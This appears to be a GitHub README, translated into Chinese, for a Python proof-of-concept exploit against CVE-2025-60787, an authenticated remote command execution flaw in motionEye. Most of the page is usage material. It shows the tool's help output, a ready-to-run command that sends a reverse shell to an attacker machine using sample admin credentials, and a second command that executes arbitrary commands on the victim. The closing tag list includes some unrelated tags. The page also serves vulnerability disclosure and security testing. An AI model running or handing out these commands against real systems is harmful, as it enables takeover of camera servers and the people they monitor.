gunzf0x/CVE-2025-60787
GitHub: gunzf0x/CVE-2025-60787
针对 CVE-2025-60787 的 Python PoC 脚本,在已获取凭证的前提下对 motionEye 受影响版本实现远程命令执行或反弹 Shell。
Stars: 0 | Forks: 0
# CVE-2025-60787 - motionEye 中的认证 RCE
针对 [CVE-2025-60787](https://nvd.nist.gov/vuln/detail/CVE-2025-60787) 的 PoC,这是 [motionEye](https://github.com/motioneye-project/motioneye) 中的一个认证 RCE 漏洞,影响版本最高至 0.43.1b4(含)。
这是针对 [此仓库](https://github.com/prabhatverma47/CVE-2025-60787) 中描述的漏洞的自动化 PoC。归功于 [prabhatverma47](https://github.com/prabhatverma47/)。
## 用法
该脚本有 2 个利用该漏洞的命令。一个是直接发送 reverse shell 的命令 `revshell`,另一个是利用此 CVE 直接执行命令的命令 `command`。
```
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
```
### Reverse Shell
使用 `revshell` 命令获取 shell。例如:
```
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
```
其中 `10.10.10.10` 是目标机器(运行 `motionEye` 的机器),`10.10.10.15` 是我们的攻击者机器,`9001` 是我们用来接收 reverse shell 的端口。
### 命令执行
如果我们想远程执行其他命令而不是 reverse shell,可以使用 `command` 选项。例如,在受害机器上执行命令 `ping -c1 10.10.10.15`:
```
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
```
其中 `10.10.10.10` 是运行 `motionEye` 的机器。
## 免责声明
使用此脚本的风险由您自己承担。
请遵守道德规范 (:
标签:CISA项目, CVE-2025-60787, Exploit, IoT安全, Maven, motionEye, PE 加载器, PoC, Python, RCE, 反向Shell, 安全测试, 开源监控, 摄像机监控, 攻击性安全, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 认证后RCE, 远程代码执行, 隐私保护